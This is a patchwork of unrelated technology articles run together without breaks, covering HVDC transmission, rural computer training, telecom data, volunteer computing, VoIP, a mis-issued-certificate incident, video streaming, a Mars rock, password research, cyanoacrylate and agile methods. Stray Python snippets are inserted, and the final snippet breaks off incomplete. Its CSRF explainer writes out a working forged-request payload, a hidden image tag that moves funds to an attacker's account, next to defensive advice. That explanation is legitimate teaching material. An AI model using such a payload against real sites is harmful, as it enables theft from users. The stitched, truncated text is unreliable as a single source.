The introduction of High Voltage Direct Current (HVDC) transmission has transformed the power system in India. Its biggest advantage is the ease of long-distance, bulk power transmission: it has made it practical to move electricity from power-surplus states to power-deficit states, which coincidentally tend to be the economically poorer and richer states respectively. The quest for clean and renewable power is growing globally year by year, and governments are looking at different ways to solve their energy problems; interconnection of HVDC systems is one of them. Substantial investment is going into connecting different power grids, and thousands of megawatts of power are sent across these grids every day. The first long-distance HVDC transmission took place in Germany in 1882, carrying only 1.5 kW over 57 km. Today the longest link is the Rio Madeira transmission link in Brazil, which is 2,385 km long and carries 7.1 GW. Over these 130 years the concept of direct current has come back into relevance, as people recognise its advantages for long-distance transmission and see how the problems faced earlier can be overcome. Thomas Edison popularised DC, but at the time it never really caught the public imagination. Now, after extensive research and new innovations in the field, industry is again looking at HVDC to overcome the problems of HVAC transmission. The average size of HVDC transmission systems has increased in recent years, and the market is growing as more countries get involved and install more HVDC links. HVDC has several advantages: over long distances it is much cheaper to transmit power, transmission losses are lower, there is no maximum transmission distance, and, very significantly, it allows power to be transferred between AC grids operating at different frequencies. This helps link otherwise incompatible grids, improves stability and strengthens the economy. The main concerns with HVDC are that its converter stations are expensive and that power-flow control must be closely coordinated, which makes multi-terminal systems costly. Large companies are entering the HVDC market with innovative ideas to address some of these issues. In an HVDC system the basic process is to convert AC to DC at the transmitting end and convert the DC back to AC at the receiving end. These conversions are performed by rectifiers and inverters; other important devices include filters, thyristors, the Insulated Gate Bipolar Transistor (IGBT) and the Voltage Source Converter (VSC). A great deal of research is going into VSCs because they are one of the keys to reducing losses. The power can be carried by overhead lines or undersea cables.
What the Report Offers
1) Market definition for the specified topic along with identification of key drivers and restraints for the market.
2) Market analysis for the HVDC transmission systems market, with region-specific assessments and competition analysis on a global and regional scale.
3) Identification of factors instrumental in changing the market scenario, rising prospective opportunities, and identification of key companies that can influence the market on a global and regional scale.
4) Extensively researched competitive landscape section with profiles of major companies along with their market shares.
5) Identification and analysis of the macro and micro factors that affect the HVDC transmission systems market on both a global and regional scale.
6) A comprehensive list of key market players along with analysis of their current strategic interests and key financial information.
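On the point above about lower losses over long distances: the saving comes largely from resistive (I²R) loss, since a DC link needs only two conductors, carries no reactive current and suffers no skin effect. A rough, purely illustrative comparison in Python is sketched below; the voltages, line length and resistance per kilometre are assumed example values, not figures from the report.

# Rough comparison of resistive losses for a 3-phase AC line vs. a bipolar HVDC link.
# All parameters are illustrative assumptions, not data from the report.
from math import sqrt

P = 6000e6          # delivered power, watts
length_km = 2000    # long-distance link, same order as Rio Madeira
r_per_km = 0.01     # ohms per km per conductor (assumed bundled-conductor value)
R = r_per_km * length_km

# Three-phase AC at 765 kV line-to-line, unity power factor assumed.
V_ac = 765e3
I_ac = P / (sqrt(3) * V_ac)          # current per phase
ac_loss = 3 * I_ac**2 * R            # three phase conductors

# Bipolar HVDC at +/-800 kV.
V_dc = 800e3
I_dc = P / (2 * V_dc)                # current per pole
dc_loss = 2 * I_dc**2 * R            # two pole conductors

print(f"AC loss ~{ac_loss/1e6:.0f} MW ({ac_loss/P:.1%}), "
      f"DC loss ~{dc_loss/1e6:.0f} MW ({dc_loss/P:.1%})")

Even this crude I²R-only estimate shows the DC link losing roughly half as much as the AC line at the same delivered power, before counting converter, corona or reactive compensation costs.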
For some states, economic development is more than bringing jobs to a region to lower the unemployment rate: It's about saving small towns from extinction. North Dakota is one of those states, and economic-development officials hope to save as many rural towns as possible from dying a slow death. For many of the state's rural residents, those small towns offer the only avenue to basic services, such as doctors, other health-care providers and even grocery stores. "When people start leaving, there's no one to provide services," said Tara Holt, director of Women and Technology, a unit of the Bismarck-based Center for Technology and Business. She cited Rugby, N.D., as a prime example of this scenario. "This is a community that sees that they would be faced with extinction if they didn't get out and create some new opportunities for the people who live in the community," Holt said. "In Rugby, the hospital has led the way. The administration has taken an old nurses' dorm and created a technology lab in that dorm." Holt said the hospital has long had a problem in getting licensed practical nurses (LPNs), so hospital brass created a system to work with a community college to educate nursing students from smaller communities so they can become LPNs. "The skill of a 12-hour class translates into so much more," Holt said. "Now, you've got a vibrant community. You've got a hospital that's going to have employees. They've taken this whole thing out into the community; this community runs seven different classes per week, with probably 12 people in each class. They've changed their mentality, and technology is the basis of so many things that the community relies on to stay alive."
Starting at Square One
Holt has organized a series of technology training courses for residents of rural towns for the last two years, and the training classes have reached approximately 7,000 people. "I traveled into rural areas and went into businesses, and one of the things that I saw was that a lot of them had computers," she said. "But, if you started talking to them about what they used them for, guess what -- they had computers, but they didn't use them. They had no one to ask." Getting such training to a rural population is difficult, Holt said, given that many of the people who need the training live three or four hours from the nearest city. Another problem was actually convincing the people that technology can be beneficial. "We needed to change the mentality of everyone in the rural areas because there was a fear of technology, instead of embracing and using [it] to make things better," she said. "They really had a tendency to either pooh-pooh it or to damn it, because they didn't know about it." The center's community computer training classes offer rural residents four courses: the introductory course; the intermediate course; the "Power-Up with Projects" course; and a "Build the Future Web Design" course. Trainers work with all ages of people, from children all the way to senior citizens. "We wrote our own curriculum," she said. "We boiled it down to the simplest elements - here's what you have to know to run a computer - and left out all the extra things you don't need to know. We printed our books in a 14-point font, which may be a small thing, but it's turned into such a friendly thing, especially for senior citizens when they're looking back and forth between a book and a screen."
Once the curriculum was developed, Holt and her staff had to look for a place to test the effectiveness of the training programs. "We found a community, Hettinger, in southwestern North Dakota, down in a corner where they're just desperate for anything," she said. "I thought we'd have about 20 students, and we had about 250 in the first few months. The community has a population of 1,200." The sheer demand forced Holt to rethink her strategy of how to best reach rural residents, so she devised a plan where her staff trained key people to be able to go out and train other people. Finding the right people to take on the role of trainer was critical to the success of the community training classes. "Every community has a few people who have decent computer skills, but, beyond that, are also good communicators and are respected in their community," she said. "In a rural area, if your peers don't respect you and you're teaching a class, they won't come. Finding those people was key to what we're doing."
Maintaining the Momentum
The need to press on in training efforts across the state is imperative, said Orlin Hanson, Economic Development Director of the Renville County Job Development Authority. "This whole northwestern part of North Dakota is in dire shape," Hanson said. "The two counties right to the West of me - Burke County and Divide County - lost 25 percent of their population over the last 10 years. A good share of that is young couples leaving. My county lost 17 percent over the same course of time." The first step to economic vitality in rural areas is developing a skilled workforce, he said, and luring companies to the state depends on having such a workforce ready. "We're trying to promote economic development, and the best way we're going to do that is with private enterprise -- somebody who has a chance to make a profit," he said. "Profit is the greatest motivating factor that mankind has ever come up with. That's what we're trying to do out here -- getting a trainable workforce so those people who see they can make a profit, they'll come in." Hanson, who lost his ranch in 1996, started as the economic development director approximately two years ago. "I told the board, 'If I take it, my first objective is getting everybody, and I mean everybody, on computers and the Internet,'" he said. "We started running computer classes that winter in three little towns, and we had 189 people take the introductory and intermediate computer courses." Holt's group of instructors trained the instructors who ultimately taught the 189 people who took the classes. "We might be rural, but we're not isolated anymore," Hanson said. Shane Peterson, News Editor
In 1876 Alexander Graham Bell made the first telephone calls using electrical signals conducted over telegraph wires. The Bell Telephone Company was founded in 1877 and by 1886 more than 150,000 people in the U.S. owned a telephone. Since these early pioneering days innovation in telecommunications has grown at an incredible pace and today generates vast quantities of associated data that is collected and stored by telecommunications companies as ‘Big Data’. In his book ‘The Rise of Humans: How to outsmart the digital deluge’, David Coplin, Chief Envisioning Officer at Microsoft UK, suggests that the biggest change we have undertaken over the last 10 years is that we no longer use technology just to connect over great distances; we increasingly use it to connect when the distances are inconsequential, thus generating a rising tide of ‘Big Data’. Big Data in telecoms is a broadly used term that references both the quantity of data being generated and stored within the industry and the data analysis techniques for extracting business intelligence from that data. Within the industry there are many approaches used to derive meaning from the data sets, and there are many challenges too. These include the storage of data in silos that are not linked, the complexity of the applications available to mine the data, and the lack of in-house knowledge to interpret the results and derive actionable meaning from them. Additionally, Big Data analysis is resource intensive and tends to produce generalisations, in part due to the difficulty in ensuring that the source data is accurate and contextually relevant. In recent online discussions some new ideas are emerging that help to produce more focussed and relevant results through the use of smaller, more consolidated data sets. This technique is being termed Smart or Skinny Data. The benefit is that researchers can be more confident that the results being produced come from relevant data sets, because irrelevant data has not been included. Today’s increasing diversity of channels, devices and digital touch points is generating higher degrees of complexity which continue to inhibit our understanding of data, and whilst this may in itself be a headache it is also an opportunity to gain real business intelligence. According to McKinsey, many organizations have yet to fully exploit the data or analytics capabilities they currently possess. So how would you go about taking advantage of the data you already have – or ‘Skinny Data’ as we now refer to it? This boils down to empowering a wide range of business users across your organization to access, understand and build insights from easily accessible data sources in a quick and easy format. Here at CTI Group we have taken ‘Skinny Data’ to heart: by consolidating data from targeted data sources, the sample data set is smaller and more relevant to the task in hand. This leads to several benefits. Firstly, the speed with which data can be analysed is much greater, making real-time analysis a reality. Secondly, using a consolidated and summarised data set requires less storage and resource to process. Thirdly, the results are reliable and relevant and can easily be interpreted by staff with little or no training in data analysis.
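As a concrete illustration of the consolidation idea, the sketch below reduces a hypothetical raw call-record table to a small, task-specific summary with pandas; the column names and metrics are invented for the example and are not CTI Group's actual schema.

# Minimal sketch: consolidate a large raw dataset into a small, task-relevant summary.
# The call-record columns below are hypothetical, for illustration only.
import pandas as pd

raw = pd.DataFrame({
    "customer_id": [1, 1, 2, 2, 2, 3],
    "call_minutes": [5.0, 12.5, 3.2, 40.0, 7.5, 0.5],
    "dropped": [0, 1, 0, 0, 1, 0],
    "region": ["north", "north", "south", "south", "south", "west"],
})

# Keep only the columns the question at hand needs, then summarise per region.
skinny = (raw[["region", "call_minutes", "dropped"]]
          .groupby("region")
          .agg(total_minutes=("call_minutes", "sum"),
               drop_rate=("dropped", "mean"),
               calls=("dropped", "size")))

print(skinny)

The summarised table is orders of magnitude smaller than the raw records, which is what makes near-real-time analysis by non-specialists practical.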
Cell phones gear up to fight AIDS
Grid computing is nothing new. In one model of this kind of shared computing, people download programs that allow their computers or laptops to donate computing cycles to projects when the machines are otherwise idle. Scientists with big computing problems can upload a computational problem to a central server, and that server then takes advantage of all the idle computers to crunch numbers and work out a solution. In the past, this kind of volunteer computing has been done with desktops and laptops, because only they had enough power to make things worthwhile. But now that smartphones are almost as powerful as desktop computers, the folks over at IBM's World Community Grid and the Olson Laboratory plan to leverage the power in everyone’s back pocket. They have developed an app to distribute the computational burden related to finding new drugs that can combat resistant strains of AIDS. To participate in the program, users simply download the Android app and install it on their phone. Thereafter, the smartphone will be sent problems and use its idle processing power to work out solutions. Even though today's phones are powerful, they still face limitations compared to desktop computers. According to the scientists working on the project, phones will only accept problems when they are connected to a Wi-Fi network, are close to fully charged and are plugged into an AC outlet. That way the project won't drain the battery or rack up usage charges. Basically, the phones will mostly be used at night when they are at home and being charged up. Although users likely won't notice their phones chugging away, scientists are hopeful that the idle phones will discover the answer to some pretty complex questions. IBM keeps a running total of how much idle time has been devoted to the project. As of this week, over 30,000 people have downloaded the app and more than 288 years of runtime has been logged. If you've got an Android and some free idle computing cycles, why not help to cure AIDS while you sleep? Posted by John Breeden II on Aug 12, 2013 at 9:33 AM
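The pattern the article describes is a simple client-side policy loop: fetch a work unit from a central server, compute only when it costs the owner nothing, and post the result back. A minimal sketch is below; the server URL, work-unit format and device-status functions are hypothetical placeholders, not part of the actual World Community Grid app.

# Sketch of a volunteer-computing client loop. The endpoint, the work-unit format
# and the device-status checks are hypothetical placeholders.
import time
import requests

WORK_SERVER = "https://grid.example.org/api"   # hypothetical endpoint

def on_wifi(): ...          # platform-specific checks, left abstract in this sketch
def battery_level(): ...
def plugged_in(): ...
def crunch(unit): ...       # the scientific computation handed out by the server

def device_ok_to_compute():
    # Only compute when it costs the owner nothing (the policy from the article).
    return on_wifi() and battery_level() is not None and battery_level() > 0.9 and plugged_in()

def run():
    while True:
        if device_ok_to_compute():
            unit = requests.get(f"{WORK_SERVER}/work").json()      # fetch a work unit
            result = crunch(unit)                                   # burn idle cycles
            requests.post(f"{WORK_SERVER}/result", json=result)     # send the answer back
        else:
            time.sleep(600)   # check again later, e.g. overnight while charging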
As chip designs shrink, following Moore's Law of ever smaller and more powerful microchips, it gets hard for developers to see what is happening. The new technique makes an electron microscope much more powerful, and lets developers look at the atomic structures and properties of the materials used, IBM said in a statement yesterday. Until now, lens imperfections or "aberrations" in electron microscopes have led to blurred images. IBM and Nion have therefore developed a way of correcting the aberrations using seven sets of lenses connected to a computer. After the correction, the microscope can make an electron beam that is only three billionths of an inch wide, which is smaller than a hydrogen atom. The beam can show clear images of the atomic structure of a semiconductor or insulating material and spot any defects, such as missing or extra atoms, according to IBM. With that knowledge, scientists can better evaluate the properties of a material and work on ways to improve it. Understanding how atoms interact with one another could also be useful in developing the conditions for future chips that can self-assemble, IBM said.
Cisco Named a Leader
Cisco is positioned as a leader in the Gartner Magic Quadrant for Unified Communications.
What is VoIP and What Can it Do for Your Business?
VoIP and IP telephony are becoming increasingly popular with large corporations and consumers alike. For many people, Internet Protocol (IP) is more than just a way to transport data; it's also a tool that simplifies and streamlines a wide range of business applications. Telephony is the most obvious example. VoIP, or voice over IP, is also the foundation for more advanced unified communications applications, including Web and video conferencing, that can transform the way you do business.
What is VoIP: Useful Terms
Understanding the terms is a first step toward learning the potential of this technology:
- VoIP refers to a way to carry phone calls over an IP data network, whether on the Internet or your own internal network. A primary attraction of VoIP is its ability to help reduce expenses because telephone calls travel over the data network rather than the phone company's network.
- IP telephony encompasses the full suite of VoIP-enabled services including the interconnection of phones for communications; related services such as billing and dialing plans; and basic features such as conferencing, transfer, forward, and hold. These services might previously have been provided by a PBX.
- IP communications includes business applications that enhance communications to enable features such as unified messaging, integrated contact centers, and rich-media conferencing with voice, data, and video.
- Unified communications takes IP communications a step further by using such technologies as Session Initiation Protocol (SIP) and presence along with mobility solutions to unify and simplify all forms of communications, independent of location, time, or device. (Learn more about unified communications.)
What is VoIP: Service Quality
Public Internet phone calling uses the Internet for connecting phone calls, especially for consumers. But most businesses are using IP telephony across their own managed private networks because it allows them to better handle security and service quality. Using their own networks, companies have more control in ensuring that voice quality is as good as, if not better than, the services they would have previously experienced with their traditional phone system.
Explore the Cisco Unified Communications System
Why VoIP? Learn how VoIP can help your small business meet its biggest challenges.
On July 2, Google became aware of fraudulent certificates that were incorrectly issued for Google-owned domain names. The certificates were issued by the National Informatics Centre (NIC) of India, which is a subordinate certification authority (CA) to the Indian Controller of Certifying Authorities (India CCA). The mis-issued certificates could have been used to spoof content, perform phishing attacks or perform man-in-the-middle (MITM) attacks. Any fraudulent activity would have been limited: the India CCA root certificate is only trusted in Microsoft Windows. It is not permitted for use with Firefox, Android, Apple iOS or OS X. Further, for Google domains any misuse would be detected in Chrome on Windows through public key pinning. The following actions were taken to resolve the problem:
- Google blocked the mis-issued certificates in its CRLSet
- India CCA revoked the subordinate CA certificate issued to NIC. Google also blocked these revoked certificates
- Microsoft updated its Certificate Trust List (CTL) to remove trust of the fraudulent certificates in Windows
- Google, through a future Chrome release, will limit trust of the India CCA root to the following domain names: gov.in, nic.in, ac.in, rbi.org.in, bankofindia.co.in, ncode.in and tcs.co.in
Although the SSL industry has taken many measures to prevent fraudulent certificates from being issued, we see that it can still happen. When preventative measures do not work, it is argued that a monitoring system is required to allow domain owners to detect when a certificate has been issued for their domain names. The monitoring system at the forefront is called Certificate Transparency (CT), which Google is pushing to be deployed. We will address CT in a future blog post.
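The pinning check that caught this in Chrome works by hashing a certificate's SubjectPublicKeyInfo and comparing it against a baked-in set of acceptable values for the domain. A rough sketch of such a check follows, assuming the Python cryptography package and a placeholder pin set; real pinning validates keys anywhere in the chain, not just the leaf.

# Sketch of an SPKI pin check (the mechanism behind public key pinning).
# The pin value is a placeholder, not one of Google's real pins.
import base64, hashlib, ssl
from cryptography import x509
from cryptography.hazmat.primitives import serialization

PINNED_SPKI = {"BASE64-SPKI-HASH-PLACEHOLDER="}   # hypothetical pin set for the site

def spki_pin(pem: str) -> str:
    cert = x509.load_pem_x509_certificate(pem.encode())
    der = cert.public_key().public_bytes(
        serialization.Encoding.DER,
        serialization.PublicFormat.SubjectPublicKeyInfo)
    return base64.b64encode(hashlib.sha256(der).digest()).decode()

pem = ssl.get_server_certificate(("www.google.com", 443))   # leaf certificate only
if spki_pin(pem) not in PINNED_SPKI:
    raise SystemExit("certificate does not match any pinned key")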
Video remains the densest and most immediate form of human communication for entertaining, persuading, educating or informing. Streaming video is technology that enables content to be delivered to a video player with little to no waiting. In the past, the limitations of connection bandwidth required viewers to trade quality for immediacy. Now, even wireless networks provide enough bandwidth to deliver video at high definition. In our instant-gratification society, waiting more than 6 seconds to be entertained, educated or informed can increase the average heart rate by 38%, the same stress level as solving a math problem or waiting at the grocery check-out, states the Ericsson Mobility Report Mobile World Congress edition.1 This is why streaming is now the dominant method of consuming video content, according to IBM Global Business Services.2 CPU- and storage-intensive video tasks are increasingly being performed in the cloud, so even mobile devices are able to render high-quality, high-definition video almost anywhere. Around 68% of viewers are watching video content on mobile devices.3 The challenges of delivering video to these devices, with limited storage and over a mobile connection, have resulted in innovative video technologies such as H.265 (High Efficiency Video Coding), HTTP Live Streaming (HLS), MPEG-DASH, and Broadcast over Long-Term Evolution (LTE). Whether streaming video on demand or live, the benefits of video streamed over the cloud are resulting in innovative business uses. Live drone footage of power lines in the Amazon can be used to direct human repair workers efficiently at reduced risk and cost. Public safety video from stadiums can help manage crowds and redirect traffic flow. Employee education can be delivered globally, aligning a multinational workforce around the same corporate messages. Real-time video of medical procedures can focus a high-performing team on a single patient no matter where the team is located. Although digital video is unstructured binary data, unlike other unstructured data it remains largely off limits to existing analytics tools. While researchers will continue to find ways of delivering video at higher definitions and faster speeds, the most exciting innovations will occur when analytic systems are as fluid at deriving insight from video as they are today from text and images. Only then will these higher-order analytics start to really emulate human cognition, possibly even exceeding the human ability to see, process and react to visual stimulation. Today and into the future, video will drive advances in technology, business and society. Becoming video-technology literate and embarking on a video strategy is a new imperative for every industry and every enterprise.
1 Ericsson Mobility Report on the Pulse of the Networked Society, Mobile World Congress edition, February 2016.
2 Personal TV, the future of broadcasting, IBM Global Business Services, September 2015.
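Of the formats mentioned above, HLS works by splitting video into short segments and publishing plain-text playlists that let a player switch between bitrate renditions. The sketch below generates a minimal master playlist; the renditions, bandwidth figures and file names are made up for illustration.

# Sketch: write a minimal HLS master playlist pointing at three hypothetical renditions.
renditions = [
    {"bandwidth": 800_000, "resolution": "640x360", "uri": "360p/index.m3u8"},
    {"bandwidth": 2_500_000, "resolution": "1280x720", "uri": "720p/index.m3u8"},
    {"bandwidth": 5_000_000, "resolution": "1920x1080", "uri": "1080p/index.m3u8"},
]

lines = ["#EXTM3U", "#EXT-X-VERSION:3"]
for r in renditions:
    lines.append(f"#EXT-X-STREAM-INF:BANDWIDTH={r['bandwidth']},RESOLUTION={r['resolution']}")
    lines.append(r["uri"])

with open("master.m3u8", "w") as f:
    f.write("\n".join(lines) + "\n")

The player reads this playlist, measures its own throughput, and requests segments from whichever rendition the connection can sustain.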
OK, maybe the Mars Rover won't find a still, or evidence of a keg party, but Curiosity's analysis of a large rock it's been zapping in order to study its composition has turned up a surprise to scientists. "This rock is a close match in chemical composition to an unusual but well-known type of igneous rock found in many volcanic provinces on Earth," Edward Stolper of the California Institute of Technology in Pasadena, a Curiosity "co-investigator," said Thursday. "With only one Martian rock of this type, it is difficult to know whether the same processes were involved, but it is a reasonable place to start thinking about its origin." The geeky way Stolper explains it here isn't going to blow the socks off a non-geologist. But here's where it gets interesting, at least in a way that might arouse some enthusiasm in your typical underclassman texting his way through a mandatory life sciences course: The formation process an igneous rock (such as the one Curiosity is studying) undergoes is similar to the way applejack liquor was made by colonial Americans. Dude! Stolper explains (as quoted by DiscoveryNews): "You take hard cider, and the way it was made in colonial times is they would put it out in big barrels in the winter and it would freeze -- but not fully, so you'd crystallize out ice and you'd make more and more and more concentrated apple-flavored liquor." "This is precisely what happens when you generate a magma on a planet. You generate magma by melting in the interior, it comes to the surface and, just like the applejack, when you cool it, it crystallizes. When it partially crystallizes, it generates a liquid that concentrates particular elements in it that are not in what's crystallizing." And around the country, thousands of frat boys have settled on their science-lab project. Here's a little primer (courtesy of Popular Mechanics) on what Suite101 calls "America's forgotten liquor."
Cross Site Request Forgery (CSRF) Attack Explained
Cross-site request forgery, or CSRF, is one of the OWASP Top Ten vulnerabilities in a web application and is quite challenging during web application penetration testing. Cross-site request forgery is an attack that becomes possible when a web application allows a visitor to predict the details of a particular action. In CSRF the attacker creates a forged HTTP request. This forged HTTP request forces the user to execute unwanted actions on a website that he trusts and on which he is currently authenticated. That said, there are two main requirements for a successful CSRF attack:
- The web application accepts HTTP requests from the authenticated user without verifying that each request is unique to the user's session. CSRF targets state-changing requests such as ticket booking, funds transfer, or buying from an online store.
- The forged HTTP request is delivered to the victim through social engineering techniques.
Consider this example attack scenario. The application allows a user to submit a state-changing request that does not include anything secret, for example a plain GET request such as http://abc.com/bankapp/transferFunds?amount=100&destinationAccount=friendsAcct. Now the attacker constructs a forged HTTP request that will transfer money from the victim's account to an account of the attacker's choice, and embeds it in an image request hosted on a website under the attacker's control:
<img src="http://abc.com/bankapp/transferFunds?amount=47840000&destinationAccount=attackersAcct#" width="0" height="0" />
Since nothing secret is sent, the attacker can easily craft a URL of his choice. If the victim visits any of the attacker's pages while already authenticated to the banking site, the forged request automatically includes the user's session cookies, authorizing the attacker's request, and the money is transferred from the victim's account to the attacker's. So in CSRF all it takes is to make you visit a page of the attacker's choice (which is very easy via social engineering) to steal money from your bank account or trigger any other state-changing action.
Prevention of CSRF:
- Use re-authentication or a CAPTCHA at state-changing operations.
- Include unique tokens in hidden form fields. This sends the token in the body of the HTTP request rather than in the URL.
- Use multi-step transactions for sensitive operations on your website.
- Append the unique token to each link on the requested page.
Code review: if there is no unique identifier (unique token) in each HTTP request that ties the request to the user's session, the application is vulnerable to a CSRF attack. A session ID alone is not enough, as it is sent with every HTTP request, legitimate or forged.
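A common way to implement the "unique token in a hidden field" defence is the synchronizer token pattern. The sketch below uses Flask purely as an illustrative framework (the article does not prescribe one); the route names, form fields and secret key are hypothetical.

# Sketch of the synchronizer-token pattern; framework, routes and fields are illustrative.
import secrets
from flask import Flask, session, request, abort, render_template_string

app = Flask(__name__)
app.secret_key = "change-me"   # placeholder; a real deployment needs a strong secret

FORM = """
<form method="POST" action="/transferFunds">
  <input type="hidden" name="csrf_token" value="{{ token }}">
  <input name="amount"> <input name="destinationAccount">
  <button>Transfer</button>
</form>
"""

@app.route("/transferForm")
def transfer_form():
    # Issue a fresh random token and tie it to the user's session.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return render_template_string(FORM, token=token)

@app.route("/transferFunds", methods=["POST"])
def transfer_funds():
    # Reject any request whose hidden-field token does not match the session copy.
    sent = request.form.get("csrf_token", "")
    if not secrets.compare_digest(sent, session.get("csrf_token", "")):
        abort(403)
    # ... perform the state-changing transfer only after the token check passes ...
    return "OK"

Because the attacker's page cannot read the victim's token, a forged cross-site request arrives without a matching value and is rejected.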
Microsoft released the third volume of its popular policymaker booklet, Building Global Trust Online, which includes considerations and guidance for a number of new safety-related topics, including combating human trafficking, online bullying and botnets. You can download, print, and distribute the guide as a 90-page brochure, in individual sections, or as two-page topical guides. Each two-page guide includes a list of resources and links to websites that provide additional support. Each topic in the guide contains an issue overview; a summary of Microsoft’s response to the issue, including technology products, services, and global collaborations, as well as a list of helpful resources and links for further reading and support. Topics addressing cybersecurity include: - Cyber Security – an Overview - Cybersecurity Norms - Critical Infrastructure Protection - Supply Chain Security - Collective Defense: Applying Public Health Models to Internet Security, and - Combating Botnets.
Gates Cambridge Trust scholar Joseph Bonneau of the University of Cambridge's Computer Laboratory was given access to 70 million anonymous passwords through internet services firm Yahoo. Using statistical guessing metrics, he trawled them for patterns, including demographic information and site-usage characteristics. Bonneau found that for all demographic groups, password security was low, even where people had to register to pay by a debit or credit card. Proactive measures to prompt people to consider more secure passwords did not make any significant difference. Even people who had had their accounts hacked did not opt for passwords that were significantly more secure. The analysis did find, however, that older users tended to have stronger online passwords than their younger counterparts. German and Korean speakers also had passwords that were more difficult to crack, while Indonesian-speaking users' passwords were the least secure. The main finding of the research was that passwords in general contain only between 10 and 20 bits of security against an online or offline attack. In his research paper, Bonneau concludes that there is no evidence that people, however motivated, will choose passwords that a capable attacker cannot crack. "This may indicate an underlying problem with passwords: that users aren't willing or able to manage how difficult their passwords are to guess," he said. Passwords have been argued to be "secure enough" for the web, with users rationally choosing weak passwords for accounts of little importance. But the research findings may undermine this explanation, said Bonneau, as user choice does not vary greatly with changing security concerns, as would be expected if weak passwords arose primarily from user apathy. Bonneau will present his findings at a security conference to be hosted by the Institute of Electrical and Electronics Engineers in May. This story was first published by Computer Weekly
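To make the "10 to 20 bits of security" figure concrete, the difficulty of guessing a password drawn from a distribution can be expressed in bits. The sketch below uses a tiny made-up frequency list; Bonneau's actual metrics, such as partial guessing entropy, are more sophisticated than this.

# Toy illustration: turn a password frequency list into "bits of security".
# The password counts below are invented for the example.
import math
from collections import Counter

observed = ["123456"] * 50 + ["password"] * 30 + ["qwerty"] * 10 + ["hunter2"] * 10
counts = Counter(observed)
total = sum(counts.values())
probs = sorted((c / total for c in counts.values()), reverse=True)

min_entropy = -math.log2(probs[0])                      # resistance to one optimal guess
shannon = -sum(p * math.log2(p) for p in probs)         # average-case uncertainty

print(f"min-entropy: {min_entropy:.2f} bits, Shannon entropy: {shannon:.2f} bits")

Even a distribution that looks varied on the surface can yield only a handful of bits against an attacker who simply tries the most common passwords first, which is the point of the study.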
Cyanoacrylate is an adhesive also known as instant glue or power glue. Its constituents are methyl 2-cyanoacrylate, ethyl 2-cyanoacrylate, 2-octyl cyanoacrylate and n-butyl cyanoacrylate. Cyanoacrylates have a very short shelf life: they should be used within a month of opening the pack and within a year of manufacture. They are very strong and very fast-acting adhesives, which makes them useful in medical, industrial and household applications. To make the adhesive more viscous, gel-like and easy to use, it is mixed with substances like fumed silica. Additives like rubber give further strength so that the bond is more impact resistant. Cyanoacrylates polymerize in the presence of water, forming long, strong chains that join the bonded surfaces. When applied thinly in the presence of normal moisture, the reaction is rapid and the bond is strong. In electronics and hobby work, they are used to assemble flying model aircraft, models, prototype electronics and miniatures. Due to their water-resistant properties, they are used in aquariums, for example to fix coral decorations in place. Mixed with baking soda, cyanoacrylate can also serve as a filler, which is useful for porous materials; aircraft modellers routinely use this technique on the propeller blades of light model aircraft. As a forensic tool, it is used to develop latent fingerprints on non-porous surfaces. In woodworking, it is used as a fast-drying adhesive which gives a glossy finish; repair work on pianos, wooden instruments and furniture is done by mixing cyanoacrylate with sawdust to fill cracks. This report aims to estimate the global cyanoacrylate market for 2014 and to project the expected demand for it by 2019. This market research study provides a detailed qualitative and quantitative analysis of the global cyanoacrylate market. It provides a comprehensive review of major drivers and restraints of the market. The global cyanoacrylate market is also segmented by major application and geography. An in-depth market share analysis, in terms of revenue, of the top companies is also included in the report. These numbers are arrived at based on key facts, annual financial information from SEC filings, annual reports, and interviews with industry experts and key opinion leaders such as CEOs, directors, and marketing executives. A detailed market share analysis of the major players in the global cyanoacrylate market has been covered in this report. Some of the major companies in this market are Arkema (France), the Dow Chemical Company (U.S.), BASF (Germany), Evonik Industries (Germany), Formosa Plastics Corporation (Taiwan), Sasol Ltd. (South Africa), Zhejiang Satellite Petrochemicals Co. (China) and Rhodia S.A. (France).
Lean management failed in the automotive industry because stable systems do not respond well to change. For example, the lead time from requirements to implementation was typically around five years. This lead time prevented American companies from using the most recent technology in automobiles. Such a lead time was acceptable when change tended to be slow. However, the industry was incapable of responding to sudden changes in customer demand, such as the demand for fuel economy during the energy crisis of the '70s. The pace of change is amplified a thousand-fold in the software industry. Massive change results from missed requirements, improper design decisions, changing technology and a changing competitive landscape. In addition, competition appears suddenly because the barrier to entry for software is much lower than it is for manufactured goods. Paradoxically, phasist processes and metrics attempt to fit software development into a stable system by controlling the phases through the artifacts that are created on the passage from phase to phase. In other words, these processes fight the very nature of modern software development based on a false assumption: that change can be managed. In addition, there is no evidence that software processes are inherently stable. More likely, it is these processes' complexity and unstable dynamics that create bug spirals, cascading missed deadlines and exponential cost-of-change curves. The spiral software development model, introduced by Barry Boehm in the 1980s, assumes that feedback and control must continually refine all aspects of the process. Agile methodologies apply the spiral model to build in dynamic mechanisms to leverage the agility of an unstable process. However, like the jet fighter, this agility comes with a cost: non-linear or even chaotic response to input. Agile methodologies must use accurate metrics and feedback to continually adjust the course of the project to keep it from spiraling out of control. For example, extreme programming (XP) uses continual feedback with metrics that assess the creation of customer value as measured in ideal engineering hours. However, this metric only measures forward progress. XP uses unit tests and task estimates vs. real programming time to ensure that developers are following the proper course. Immediate customer feedback on completed features allows instant evaluation of the completeness of requirements, and automation of the tests keeps the course moving forward as there will be no back-tracking. However, if any of these metrics are inaccurate or ignored, there is a possibility that the entire project will spiral out of control. Ironically, agile methodologies require systematic and even pedantic application of metrics to adapt to change without spiraling out of control. Much has been written about the difference between agile and 'plan-based' software methodologies. Most of these articles are no more than thinly veiled advocacy for a particular development process without examining the first principles of design. This article discussed software process by applying the fundamental principles of control theory and revealed the fundamental weakness and strength of each approach. Taylorist approaches assume and enforce the stability of the process. This stability allows Gantt-chart-style predictability but mandates strict control of change throughout the process. Agile methodologies allow organizations to meet changing needs and requirements, but they need accurate, instantaneous metrics with feedback and control.
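As a toy illustration of the estimates-versus-actuals feedback loop described above, the sketch below compares estimated ideal hours with actual hours per iteration and flags drift before it compounds; the numbers and the 20 percent threshold are invented for the example.

# Toy feedback metric: compare estimated ideal hours to actual hours per iteration.
# The iteration data and the drift tolerance are illustrative assumptions.
iterations = [
    {"name": "it-1", "estimated": 80, "actual": 78},
    {"name": "it-2", "estimated": 85, "actual": 95},
    {"name": "it-3", "estimated": 90, "actual": 120},
]

DRIFT_LIMIT = 0.20   # assumed tolerance before the plan must be re-estimated

for it in iterations:
    drift = (it["actual"] - it["estimated"]) / it["estimated"]
    status = "ON TRACK" if abs(drift) <= DRIFT_LIMIT else "RE-PLAN"
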